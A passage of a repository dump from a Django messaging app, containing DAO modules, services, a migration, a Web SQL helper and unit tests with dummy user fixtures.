约定:假定django框架所给的都是值得信赖的\n # 约定:下面的测试函数可以使用上面测试过的函数\n # 约定:一个测试函数不可以使用另外一个测试函数新加的变量,只使用setup中设置的变量\n # 测试中要用到的全局在setUp这里设置\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n \n\n # 加了之后的数量减去加了之前的数量等于1\n def test_insertUser(self):\n user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank3\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111113\"}\n before = len(User.objects.all())\n insertUser(**user3)\n after = len(User.objects.all())\n self.assertEqual(after-before,1)\n \n def test_getUserById(self):\n self.assertEqual(getUserById(1).id,1)\n self.assertEqual(getUserById(2).id,2)\n\n def test_updateUser(self):\n modified_user = {\"id\":1,\"password\":\"changed_password\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"auto_generating_code\"}\n updateUser(**modified_user)\n self.assertEqual(getUserById(1).password,\"changed_password\")\n\n def test_deleteUser(self):\n deleteUser(1)\n deleteUser(2)\n self.assertEqual(len(User.objects.filter(id=1)), 0)\n self.assertEqual(len(User.objects.filter(id=2)), 0)\n\n def test_getUserByCode(self):\n self.assertEqual(getUserByCode(\"111111111\").id,1)\n self.assertEqual(getUserByCode(\"111111112\").id,2)\n\n def test_validateByPhone(self):\n self.assertEqual(validateUserByPhone(\"111111111\",\"7654321\"),True )\n 
self.assertEqual(validateUserByPhone(\"111111111\",\"1234567\"),False )\n self.assertEqual(validateUserByPhone(\"111111112\",\"1234567\"),True )\n self.assertEqual(validateUserByPhone(\"111111112\",\"7654321\"),False )\n self.assertEqual(validateUserByPhone(\"13570517280\",\"whatever\"),False )\n self.assertEqual(validateUserByPhone(\"13570517281\",\"whatever\"),False )\n\n def test_validateByCode(self):\n self.assertEqual(validateUserByCode(\"111111111\",\"7654321\"),True )\n self.assertEqual(validateUserByCode(\"111111112\",\"1234567\"),True )\n self.assertEqual(validateUserByCode(\"111111111\",\"1234567\"),False )\n self.assertEqual(validateUserByCode(\"111111112\",\"7654321\"),False )\n self.assertEqual(validateUserByCode(\"111111113\",\"whatever\"),False )\n self.assertEqual(validateUserByCode(\"111111114\",\"whatever\"),False )\n\n"
},
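The get/filter comments in the test above deserve a concrete illustration; a small sketch (not in the repo) of the difference:

    from adam2014.models import User

    try:
        u = User.objects.get(id=999)       # get() raises User.DoesNotExist for a missing row
    except User.DoesNotExist:
        u = None

    qs = User.objects.filter(id=999)       # filter() never raises for a missing row
    assert len(qs) == 0                    # it returns an empty queryset instead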
{
"alpha_fraction": 0.7256532311439514,
"alphanum_fraction": 0.735154390335083,
"avg_line_length": 26.19354820251465,
"blob_id": "624a183b19bff9006713e488a6430393836b814f",
"content_id": "6c140444c2e87569bfd7669a3ccd07554edc4cfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 842,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 31,
"path": "/zzc/adam2014/DAO/ImmediatelyMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import ImmediatelyMessage\n# class ImmediatelyMessage(models.Model):\n# user_from = models.ForeignKey(User)\n# message = models.ForeignKey(Message)\n# user_to_id = models.IntegerField()\n# time = models.DateTimeField()\n# type = models.IntegerField()\n\ndef insertImmediatelyMessage(**immediatelyMessage):\n i = ImmediatelyMessage.objects.create(**immediatelyMessage)\n return i;\n\n\ndef deleteImmediatelyMessage(id):\n ImmediatelyMessage.objects.get(id=id).delete()\n\ndef getImmediatelyMessageById(id):\n return ImmediatelyMessage.objects.get(id=id)\n\n\ndef updateImmediatelyMessage(**kw):\n ImmediatelyMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.7046154141426086,
"alphanum_fraction": 0.7169230580329895,
"avg_line_length": 22.178571701049805,
"blob_id": "e3758fb0c5b70e333f62d4471b203bf9c780ab56",
"content_id": "8ce6399f407dd98481f647344699bc3f070315f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 28,
"path": "/zzc/adam2014/DAO/TextMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import TextMessage\n# class TextMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\n\ndef insertTextMessage(**textMessage):\n t = TextMessage.objects.create(**textMessage)\n return t\n\n\ndef deleteTextMessage(id):\n TextMessage.objects.get(id=id).delete()\n\ndef getTextMessageById(id):\n return TextMessage.objects.get(id=id)\n\ndef updateTextMessage(**kw):\n TextMessage.objects.filter(id=kw['id']).update(**kw)\n\n"
},
{
"alpha_fraction": 0.6935749650001526,
"alphanum_fraction": 0.7108731269836426,
"avg_line_length": 27.186046600341797,
"blob_id": "24e9687185815fe8d66997a25cf9c669a7577cf7",
"content_id": "da3c02ae4aae1f248ab036558b380abfce0a320c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1214,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 43,
"path": "/zzc/adam2014/DAO/BottlePictureDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import BottlePicture\nfrom django.db import connection\n# class BottlePicture(models.Model):\n# usedTimes = models.IntegerField()\n# tookTime = models.DateTimeField()\n# user = models.ForeignKey(User,null=True)\n# author = models.CharField(max_length=32,null=True)\n# content = models.TextField(max_length=90)\n# longitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n# latitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n\ndef insertBottlePicture(**bottlePicture):\n b = BottlePicture.objects.create(**bottlePicture)\n return b;\n\ndef deleteBottlePicture(id):\n BottlePicture.objects.get(id=id).delete()\n\ndef getBottlePictureById(id):\n return BottlePicture.objects.get(id=id)\n\ndef updateBottlePicture(**kw):\n BottlePicture.objects.filter(id=kw['id']).update(**kw)\n\n\n\ndef maxId():\n sql = \"SELECT MAX(id) FROM adam2014_BottlePicture\"\n cursor = connection.cursor()\n cursor.execute(sql)\n row = cursor.fetchone()\n #row = cursor.fetchall()\n return row[0]\n\n\n"
},
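maxId() above drops to raw SQL through connection.cursor(). The same value is available through the ORM's aggregation API, which also sidesteps table-name casing entirely; a sketch (maxIdOrm is a hypothetical alternative, not repo code):

    from django.db.models import Max
    from adam2014.models import BottlePicture

    def maxIdOrm():
        # aggregate() returns {'id__max': <int or None>}; None when the table is empty
        return BottlePicture.objects.aggregate(Max('id'))['id__max']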
{
"alpha_fraction": 0.7369726896286011,
"alphanum_fraction": 0.7444168925285339,
"avg_line_length": 33.57143020629883,
"blob_id": "bbe4640416b1753d6779a4768ede3615361cbdee",
"content_id": "e9535c98eb767f60c0a4ffa77b9dcc494be96482",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1219,
"license_type": "permissive",
"max_line_length": 172,
"num_lines": 35,
"path": "/Distance/js/main_insert_message_sql.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "//打开数据库\nvar db = openDatabase('localdb', '', 'local database', 204800);\nfunction insertMessage(user_from_id,to_id,content_type,type,content){\n\n\tvar newDate = new Date();\n\tvar currentYear=newDate.getFullYear();\n\tvar currentMonth=newDate.getMonth()+1;\n\tvar currentDate=newDate.getDate();\n\tvar currentHour=newDate.getHours();\n\tvar currentMinute=newDate.getMinutes();\n\tvar currentSecond=newDate.getSeconds();\n\tvar currentDateTime=currentYear+\"-\"+currentMonth+\"-\"+currentDate+\" \"+currentHour+\":\"+currentMinute+\":\"+currentSecond;\n\t\ndb.transaction(function(tx){\n\ttx.executeSql('insert into message values (?,?,?,?,?,?)',[user_from_id,to_id,currentDateTime,content_type,type,content],onInsertSuccess,onInsertError);\n\ttx.executeSql('update messageList set time = ? where user_from_id = ? and to_id = ? and type = ?',[currentDateTime,user_from_id,to_id,type],onUpdateSuccess,onUpdateError);\n})\n}\nfunction onInsertSuccess(tx,rs)\n{\n\tconsole.log(\"Insert successfully\");\n}\nfunction onInsertError(tx,error)\n{\n\tconsole.log(error.message);\n}\nfunction onUpdateSuccess(tx,rs)\n{\n\tconsole.log(\"Update successfully\");\n}\nfunction onUpdateError(tx,error)\n{\n\tconsole.log(error.message);\n}\n//insertMessage(1,2,\"text\",\"contact\",\"hehe\");"
},
{
"alpha_fraction": 0.6025878190994263,
"alphanum_fraction": 0.6288354992866516,
"avg_line_length": 32,
"blob_id": "d7343ed57a9a21cade13b966994aab23bfaa7a40",
"content_id": "8b62177300b5a7088701c01864bd274fc0785663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2721,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 82,
"path": "/zzc/adam2014/AllTest/DAOTest/testTextMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'Joe'\n\nfrom django.test import TestCase\nfrom adam2014.DAO.TextMessageDAO import *\nfrom adam2014.models import TextMessage\nfrom adam2014.models import Message\n\nclass TestMessageDAOTest(TestCase):\n\n def setUp(self):\n\n # 文字\n self.message1 = {\"id\": 1, \"type\": \"1\", \"content_id\": \"1\"}\n # 图片\n self.message2 = {\"id\": 2, \"type\": \"2\", \"content_id\": \"2\"}\n # 语音\n self.message3 = {\"id\": 3, \"type\": \"3\", \"content_id\": \"3\"}\n # 位置\n self.message4 = {\"id\": 4, \"type\": \"4\", \"content_id\": \"4\"}\n\n self.message1 = Message.objects.create(**self.message1)\n self.message2 = Message.objects.create(**self.message2)\n self.message3 = Message.objects.create(**self.message3)\n self.message4 = Message.objects.create(**self.message4)\n\n self.text_message1 = {\"id\": 1, \"message\": self.message1, \"content\": \"I am a boy\"}\n self.text_message2 = {\"id\": 2, \"message\": self.message2, \"content\": \"I am a girl\"}\n self.text_message3 = {\"id\": 3, \"message\": self.message3, \"content\": \"I am not a boy or a girl\"}\n\n self.text_message1 = TextMessage.objects.create(**self.text_message1)\n self.text_message2 = TextMessage.objects.create(**self.text_message2)\n self.text_message3 = TextMessage.objects.create(**self.text_message3)\n\n def testInsertTextMessage(self):\n\n text_message4 = {\"id\": 4, \"message\": self.message4, \"content\": \"I am a freak\"}\n\n before = len(TextMessage.objects.all())\n print \"testInsertTextMessage before: \"\n print(TextMessage.objects.all())\n\n insertTextMessage(**text_message4)\n\n after = len(TextMessage.objects.all())\n print \"testInsertTextMessage after: \"\n print(TextMessage.objects.all())\n\n self.assertEqual(after-before, 1)\n\n def testDeleteTextMessage(self):\n\n print \"deleteTextMessage before:\"\n print len(TextMessage.objects.all())\n\n deleteTextMessage(1)\n deleteTextMessage(2)\n deleteTextMessage(3)\n\n print \"deleteTextMessage after:\"\n print len(TextMessage.objects.all())\n\n def testGetTextMessage(self):\n\n print(\"testGetTextMessageById 1&2:\")\n self.assertEqual(getTextMessageById(1).id, 1)\n print(getTextMessageById(1))\n self.assertEqual(getTextMessageById(2).id, 2)\n print(getTextMessageById(2))\n\n def testUpdateTextMessageById(self):\n\n print \"Before update: \"\n print getTextMessageById(1)\n\n text_message = getTextMessageById(1)\n text_message.content = \"hello, am i handsome\"\n\n text_message.save()\n\n print \"After update: \"\n print getTextMessageById(1)"
},
{
"alpha_fraction": 0.7026712894439697,
"alphanum_fraction": 0.7119628190994263,
"avg_line_length": 25.121212005615234,
"blob_id": "b356ded0266d6ecdb4bb0fd886a62859d91d2556",
"content_id": "52dc148e040324c88604ae9df1dc9983d6c22a9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 33,
"path": "/zzc/adam2014/DAO/MessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import Message\n# class Message(models.Model):\n# time = models.DateTimeField()\n# type = models.IntegerField()\n# content_id = models.IntegerField()\n# users = models.ManyToManyField(User,through='ImmediatelyMessage')\n# groups = models.ManyToManyField(Group,through='GroupMessage')\n\ndef insertMessage(**message):\n m = Message.objects.create(**message)\n return m;\n\ndef deleteMessage(id):\n Message.objects.get(id=id).delete()\n\ndef getMessageById(id):\n return Message.objects.get(id=id)\n\ndef getMessageByContentId(content_id):\n return Message.objects.filter(content_id=content_id)\n\ndef updateMessage(**kw):\n Message.objects.filter(id=kw['id']).update(**kw)"
},
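The commented model above declares its many-to-many links with explicit through models, so per-conversation queries go through those intermediate tables. A sketch (not in the repo) fetching every message user 1 sent directly to user 2:

    from adam2014.models import ImmediatelyMessage

    rows = ImmediatelyMessage.objects.filter(user_from_id=1, user_to_id=2)
    msgs = [row.message for row in rows]   # follow the FK to the Message rows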
{
"alpha_fraction": 0.6550801992416382,
"alphanum_fraction": 0.6684492230415344,
"avg_line_length": 18.6842098236084,
"blob_id": "2a8dde1ea7121c06e6fd9bd6faf6c465f13c0578",
"content_id": "77e9527d07032d25f0c1f40e9374b98ea4dfd319",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 19,
"path": "/zzc/adam2014/Service/JoinService/User_groupService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.DAO.JoinDAO import User_groupDAO\n\ndef getUser_groups(user_id):\n user_groups = []\n try:\n user_groups = User_groupDAO.getGroup_userListView(user_id)\n\n except:\n pass\n return user_groups\n"
},
{
"alpha_fraction": 0.5147058963775635,
"alphanum_fraction": 0.5160427689552307,
"avg_line_length": 33.04545593261719,
"blob_id": "47fb40c5521c6eb934134c713e39086cb7cd8fdf",
"content_id": "1c57a5d616ca1c44aeb2024fcfa9f461b67fe7f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 748,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 22,
"path": "/zzc/adam2014/JoinModels/User_group.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\nclass User_group(object):\n def __init__(self,id,time,group_id,name,ucount,code,create_id):\n self.id = id\n self.group_id = group_id\n self.time = time\n self.name = name\n self.ucount = ucount\n self.code = code\n self.create_id = create_id\n\n def printout(self):\n print(\"id: \"+str(self.id)+\" group_id: \"+str(self.group_id)+\" time \"+str(self.time)\n +\" name: \"+str(self.name)+\" ucount: \"+str(self.ucount)\n +\" code: \"+str(self.code)+' create_id: '+str(self.create_id))\n\n def object2dict(obj):\n d = {}\n #d['__class__'] = obj.__class__.__name__\n #d['__module__'] = obj.__module__\n d.update(obj.__dict__)\n return d"
},
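object2dict in these join classes exists because json.dumps cannot serialize arbitrary objects on its own; passed as the default hook, it converts each instance to a plain dict first. A usage sketch (not in the repo; the constructor arguments are made-up sample values):

    import json
    from adam2014.JoinModels.User_group import User_group

    ug = User_group(1, '2014-11-11 14:08:57', 2, 'helloworld', 3, 'code123', 1)
    print(json.dumps(ug, default=User_group.object2dict))  # serialized via __dict__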
{
"alpha_fraction": 0.6944444179534912,
"alphanum_fraction": 0.7108585834503174,
"avg_line_length": 19.710525512695312,
"blob_id": "b874244e1059a8e63b53044430cb689417aa5958",
"content_id": "f361c22512a349229e596683bdeabf944842999a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 792,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 38,
"path": "/zzc/adam2014/Service/GroupService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import User\nfrom adam2014.models import Group\nfrom adam2014.DAO import GroupDAO\n\n\ndef newGroup(**group):\n g = GroupDAO.insertGroup(**group)\n return g;\n\ndef deleteGroup(id):\n GroupDAO.deleteGroup(id=id)\n\ndef getGroupById(id):\n return GroupDAO.getGroupById(id=id)\n\ndef getGroupByCode(code):\n return GroupDAO.getGroupByCode(code=code)\n\ndef updateGroup(**group):\n GroupDAO.updateGroup(**group)\n\ndef getGroup_Users(id):\n users = Group.objects.get(id=id).users.all()\n return users\n\ndef getGroup_UsersByCondition(id,**user):\n users = Group.objects.get(id=id).users.filter(**user)\n return users\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7061224579811096,
"alphanum_fraction": 0.7170068025588989,
"avg_line_length": 24.379310607910156,
"blob_id": "b51351b8f71e42b4b79d779f3a5ea96b5f011922",
"content_id": "8d49cc912d2abb6570700ea2950821729158868b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 29,
"path": "/zzc/adam2014/DAO/GroupMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import GroupMessage\n\n# class GroupMessage(models.Model):\n# user_from = models.ForeignKey(User)\n# message = models.ForeignKey(Message)\n# group_to = models.ForeignKey(Group)\n# time = models.DateTimeField()\n\ndef insertGroupMessage(**groupMessage):\n g = GroupMessage.objects.create(**groupMessage)\n return g;\n\ndef deleteGroupMessage(id):\n GroupMessage.objects.get(id=id).delete()\n\ndef getGroupMessageById(id):\n return GroupMessage.objects.get(id=id)\n\ndef updateGroupMessage(**kw):\n GroupMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6056177616119385,
"alphanum_fraction": 0.645663321018219,
"avg_line_length": 42.858333587646484,
"blob_id": "4d610abb8a4eb0c235c49b97854fdb4064cc8a59",
"content_id": "a08c110bf56494d85ea89e9fd511228992115a55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5413,
"license_type": "no_license",
"max_line_length": 209,
"num_lines": 120,
"path": "/zzc/adam2014/AllTest/DAOTest/testGroupMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'CF'\n\n\nfrom django.test import TestCase\nfrom adam2014.DAO.AddFriendDAO import *\nfrom adam2014.DAO.GroupMessageDAO import *\nfrom adam2014.models import User\nfrom adam2014.models import Group\nfrom adam2014.models import Message\nfrom adam2014.models import TextMessage\nfrom adam2014.models import PictureMessage\nfrom adam2014.models import VoiceMessage\nfrom adam2014.models import LocationMessage\nimport datetime\n\nclass GroupMessageDAOTest(TestCase):\n def setUp(self):\n \t# 假设群组里面有3个人\n \t# 名字为“helloworld”\n \t# creator是self.user\n\n \t# 其中self.user发送了一条文字信息\n \t# self.user2发送了一条语音信息\n \t# self.user3发送了一条图片信息\n \t# self.user3发送了一条位置信息\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n self.group1 = {\"id\":1,\"code\":\"this_is_code\",\"name\":\"helloworld\",\"ucount\":3,\"creater_id\":1}\n\n Group.objects.create(**self.group1)\n\n self.textMessage = {\"id\":1,\"type\":1,\"content_id\":1} # 文字\n self.voiceMessage = {\"id\":2,\"type\":2,\"content_id\":2} # 语音\n self.pictureMessage = {\"id\":3,\"type\":3,\"content_id\":3} #图片\n self.locationMessage = {\"id\":4,\"type\":4,\"content_id\":4} #位置\n\n Message.objects.create(**self.textMessage)\n Message.objects.create(**self.voiceMessage)\n Message.objects.create(**self.pictureMessage)\n Message.objects.create(**self.locationMessage)\n\n self.message1 = {\"id\":1,\"time\":self.time,\"user_from_id\":1,\"group_to_id\":1,\"message_id\":1}\n self.message2 = {\"id\":2,\"time\":self.time,\"user_from_id\":2,\"group_to_id\":1,\"message_id\":2}\n self.message3 = {\"id\":3,\"time\":self.time,\"user_from_id\":3,\"group_to_id\":1,\"message_id\":3}\n self.message4 = {\"id\":4,\"time\":self.time,\"user_from_id\":3,\"group_to_id\":1,\"message_id\":4}\n\n GroupMessage.objects.create(**self.message1)\n GroupMessage.objects.create(**self.message2)\n GroupMessage.objects.create(**self.message3)\n GroupMessage.objects.create(**self.message4)\n\n self.text = {\"id\":1,\"message_id\":1,\"content\":\"message1\"}\n self.picture = {\"id\":2,\"message_id\":2,\"content\":\"this is the binary data of a image\"}\n self.voice = {\"id\":3,\"message_id\":3,\"content\":\"this is the data of a voice file\"}\n self.location = {\"id\":4,\"message_id\":4,\"content\":\"this is data of a location\"}\n\n TextMessage.objects.create(**self.text)\n PictureMessage.objects.create(**self.picture)\n VoiceMessage.objects.create(**self.voice)\n LocationMessage.objects.create(**self.location)\n\n def testInsertGroupMessage(self):\n \t# user发送了一条信息--文本消息\n user_from_id = self.user['id']\n\n message = {\"id\":5,\"type\":1,\"content_id\":5}\n text2 = {\"id\":5,\"message_id\":5,\"content\":\"message2\"}\n \n Message.objects.create(**message)\n 
TextMessage.objects.create(**text2)\n\n groupmsg = {\"id\":5,\"time\":self.time,\"user_from_id\":1,\"group_to_id\":1,\"message_id\":5}\n before = len(GroupMessage.objects.all())\n # print(\"testInsertAddFriend before:\")\n # print(AddFriend.objects.all())\n insertGroupMessage(**groupmsg)\n after = len(GroupMessage.objects.all())\n # print(\"testInsertAddFriend after:\")\n # print(AddFriend.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetGroupMessageById(self):\n # print(\"testGetAddFriendById 1&2:\")\n self.assertEqual(getGroupMessageById(1).id,1)\n # print(getAddFriendById(1))\n self.assertEqual(getGroupMessageById(2).id,2)\n self.assertEqual(getGroupMessageById(3).id,3)\n self.assertEqual(getGroupMessageById(4).id,4)\n # print(getAddFriendById(2))\n\n def testUpdateGroupMessage(self):\n \tmsg = {\"id\":5,\"type\":1,\"content_id\":5}\n \tMessage.objects.create(**msg)\n\n modified_GroupMessage = {\"id\":4,\"time\":self.time,\"user_from_id\":3,\"group_to_id\":1,\"message_id\":5}\n updateGroupMessage(**modified_GroupMessage)\n self.assertEqual(getGroupMessageById(4).message_id,5)\n # print(\"testUpdateAddFriend user_from_id=2&user_to_id=1\")\n # print(getAddFriendById(1))\n\n def testDeleteGroupMessage(self):\n deleteGroupMessage(1)\n deleteGroupMessage(2)\n deleteGroupMessage(3)\n # print(\"testDeleteAddFriend id=1||2||3:\")\n # print(AddFriend.objects.all())\n\n self.assertEqual(len(GroupMessage.objects.filter(id=1)),0)\n self.assertEqual(len(GroupMessage.objects.filter(id=2)),0)\n self.assertEqual(len(GroupMessage.objects.filter(id=3)),0)\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5265700221061707,
"alphanum_fraction": 0.5716586112976074,
"avg_line_length": 23.84000015258789,
"blob_id": "2aada5c93e53917ab98f60e92de4b69820720c22",
"content_id": "b03882716df0a39059a17cc631359d4f1acdc0ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 621,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 25,
"path": "/zzc/adam2014/migrations/0002_auto_20141207_1331.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('adam2014', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='message',\n name='time',\n field=models.DateTimeField(default=datetime.datetime(2014, 12, 7, 13, 31, 19, 905587)),\n ),\n migrations.AlterField(\n model_name='user',\n name='photo',\n field=models.FileField(upload_to=b'./upload/photo/'),\n ),\n ]\n"
},
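The frozen timestamp in the migration above is what makemigrations records when a model field is declared with default=datetime.datetime.now(); the call runs once at import time, so every row would get that 2014-12-07 instant. Passing the callable itself, or using auto_now_add, keeps the default dynamic; a sketch of the field declaration (an assumption about the intended model, not repo code):

    import datetime
    from django.db import models

    class Message(models.Model):
        time = models.DateTimeField(auto_now_add=True)   # set when the row is first saved
        # or, equally dynamic: pass the callable and note the missing ()
        # time = models.DateTimeField(default=datetime.datetime.now)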
{
"alpha_fraction": 0.5976470708847046,
"alphanum_fraction": 0.6364706158638,
"avg_line_length": 49.386138916015625,
"blob_id": "b6933e336758256d0d98594cc713c5e702357634",
"content_id": "20bc7950636ac52777c891535c8d8c931180abe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5136,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 101,
"path": "/zzc/adam2014/AllTest/DAOTest/testImmediatelyMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.ImmediatelyMessageDAO import *\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.DAO.TextMessageDAO import *\nfrom adam2014.models import ImmediatelyMessage\nfrom adam2014.models import Message\nfrom adam2014.models import User\nfrom adam2014.models import TextMessage\nimport datetime\n\n\nclass ImmediatelyMessageTest(TestCase):\n def setUp(self):\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user4 = {\"id\":4,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n self.inBlackList = False;\n self.top = False;\n\n self.textmessage1 = {\"id\":1,\"content\":\"I am a txt message \",\"message_id\":1}\n self.textmessage2 = {\"id\":2,\"content\":\"I am a txt message \",\"message_id\":2}\n self.textmessage3 = {\"id\":3,\"content\":\"I am a txt message \",\"message_id\":3}\n self.textmessage4 = {\"id\":4,\"content\":\"I am a txt message \",\"message_id\":4}\n\n self.message1 = {\"id\":1,\"time\":str(self.time),\"type\":1,\"content_id\":1}\n self.message2 = {\"id\":2,\"time\":str(self.time),\"type\":1,\"content_id\":2}\n self.message3 = {\"id\":3,\"time\":str(self.time),\"type\":1,\"content_id\":3}\n self.message4 = {\"id\":4,\"time\":str(self.time),\"type\":1,\"content_id\":4}\n\n self.immediatelyMessage1 = 